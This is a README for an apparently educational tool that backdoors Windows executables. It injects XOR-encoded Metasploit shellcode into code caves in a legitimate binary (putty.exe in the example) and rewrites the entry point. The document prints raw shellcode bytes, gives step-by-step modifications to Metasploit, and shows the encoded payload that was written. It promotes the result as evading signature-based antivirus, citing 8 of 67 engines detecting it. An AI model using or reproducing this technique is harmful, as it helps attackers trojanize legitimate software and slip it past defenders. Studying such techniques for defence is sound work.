# PE inject

## 0x01 Intro

An old project that i never take time to finish, the tool has been coding for educative purpose and get a better understanding to the following question _"how to backdoor an executable and encoding payload"_

If you are looking a damn good tool to encode metasploit payload, go directly to Veil (https://www.veil-framework.com)

The project is divided in 2 parts :
  * Works on the PE file
    + search for code cave in legitimate binary (parsing section)
    + write custom payload in the code cave
    + change permission on the section
    + rewrite oep
    + execute payload
  * Encode shellcode
    + basic xor encryption is performed on the original shellcode (random key used)
    + add a loader to de-xor in memory the payload
    + execute "true" payload

It allow to bypass at least all signature based AV since the metasploit payload is xor and doesnot have the same signature.

The asm parts have been tested by using Fasm on windows https://flatassembler.net/

## 0x02 Payload

msfvenom is used in order to get a payload to inject in the binary, however, it is requiered to modify the msfvenom payload otherwise it does not exit properly ... _dunno why ?!_

In the directory of metasploit edit the file _src/single/single_exec.asm_ and comment the following line `;%include "./src/block/block_exitfunk.asm" in order to delete the EXITFUNC`


```
~/tools/metasploit-framework/external/source/shellcode/windows/x86$ python build.py single_exec

# Name: single_exec
# Length: 153 bytes
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x6A\x01\x8D\x85\x93\x00\x00" +
"\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5"

Modify the following file lib/msf/core/payload/windows/exec.rb by replacing the payload filed with the previous one and comment the block
          #'Offsets' =>
          #  {
          #    'EXITFUNC' => [ 154, 'V' ]
          #  },
```

## 0x03 Installation

The tools requiered to install pefile library which is supported only in python2.7 ... that explains why the code is not python3 compatible ....

`pip install pefile`



## 0x04 Usage

```
(tmp)$ python poo/main.py putty.exe
#################################
#        EDU PEINJECT           #
#################################

[*] Info on PeFile ...
 + Original EOP	0005c728
section .text
  +VirtualAddress   : 0x00001000
  +PointerToRawData : 0x00000400
  +SizeOfRawData    : 0x0007ac00
  +Characteristics  : 0x60000020
section .rdata
  +VirtualAddress   : 0x0007c000
  +PointerToRawData : 0x0007b000
  +SizeOfRawData    : 0x00025c00
  +Characteristics  : 0x40000040
section .data
  +VirtualAddress   : 0x000a2000
  +PointerToRawData : 0x000a0c00
  +SizeOfRawData    : 0x00001200
  +Characteristics  : 0xc0000040
section .rsrc
  +VirtualAddress   : 0x000a7000
  +PointerToRawData : 0x000a1e00
  +SizeOfRawData    : 0x00003000
  +Characteristics  : 0x40000040
section .reloc
  +VirtualAddress   : 0x000aa000
  +PointerToRawData : 0x000a4e00
  +SizeOfRawData    : 0x00006000
  +Characteristics  : 0x42000040

[*] Xoring payload...
 + key found 0xb5
 + Xoring payload done

[*] Create loader for de_xoring in memory...
 + Injecting original OEP 0x0005c728 for callback

[*] Len final shellcode 221

[*] search code cave in all section ...
 + payload length 224
 + code cave found into .text at address 0x0007babb size 224
 + code cave found into .rdata at address 0x0009b6b4 size 224
 + code cave found into .rdata at address 0x0009b8b7 size 224
 + code cave found into .data at address 0x000a20e5 size 224
 + code cave found into .rsrc at address 0x000a9eb7 size 224

 + return first Pointer to code cave 0x0007babb in the section .text

[*] section .text has been forced to be rwx 0xE0000020
 + check section .text new Characteristics 0xe0000020

[*] write shellcode to code cave offset 0x0007babb
 + check ecriture payload :
 \x60\x31\xc0\x31\xd2\x31\xc9\x31\xdb\xe8\x00\x00\x00\x00\x5f\x83\xc7\x13\xb1\xa4\x8a\x17\xb0\xb5\x30\xd0\x88\x07\x47\xfe\xc9\x75\xf3\x49\x5d\x37\xb5\xb5\xb5\xd5\x3c\x50\x84\x75\xd1\x3e\xe5\x85\x3e\xe7\xb9\x3e\xe7\xa1\x3e\xc7\x9d\xba\x02\xff\x93\x84\x4a\x19\x89\xd4\xc9\xb7\x99\x95\x74\x7a\xb8\xb4\x72\x57\x47\xe7\xe2\x3e\xe7\xa5\x3e\xff\x89\x3e\xf9\xa4\xcd\x56\xfd\xb4\x64\xe4\x3e\xec\x95\xb4\x66\x3e\xfc\xad\x56\x8f\xfc\x3e\x81\x3e\xb4\x63\x84\x4a\x19\x74\x7a\xb8\xb4\x72\x8d\x55\xc0\x43\xb6\xc8\x4d\x8e\xc8\x91\xc0\x51\xed\x3e\xed\x91\xb4\x66\xd3\x3e\xb9\xfe\x3e\xed\xa9\xb4\x66\x3e\xb1\x3e\xb4\x65\x3c\xf1\x91\x91\xee\xee\xd4\xec\xef\xe4\x4a\x55\xea\xea\xef\x3e\xa7\x5e\x38\xe8\xdf\xb4\x38\x30\x26\xb5\xb5\xb5\xe5\xdd\x84\x3e\xda\x32\x4a\x60\xc5\xda\xc2\xd0\xc7\xc6\xdd\xd0\xd9\xd9\xb5\x61\x64\x8b\x05\x30\x00\x00\x00\x8b\x80\x08\x00\x00\x00\x81\xc0\x28\xc7\x05\x00\x50\x31\xc0\xc3

[*] rewrite oep 0x0005c728 to point on our payload 0x0007babb
 + check value oep 0x0007babb

[*] Error checksum detected : correct with 0x000b2378 - 750284
 + check checksum : True

[*] Checking if payload still correctly write : True

[*] writing new pe file letstry.exe....
```

The binary works correctly

![run](png/VT_letstry3.png)

## 0x05 Conclusion

This project was funny in order to understand how it is possible to change code in memory by simply xor the payload which allow to bypass the AV signature detection based since the payload is different from the original msf ...

With a trivial educationnal exemple only 8/67 AV detect the true payload, _not bad_

![av](png/VT_letstry4.png)

The tool could be easily improve by doing substitution of command in addition of xoring, for example replace `mov eax,0` by `xor eax,eax`
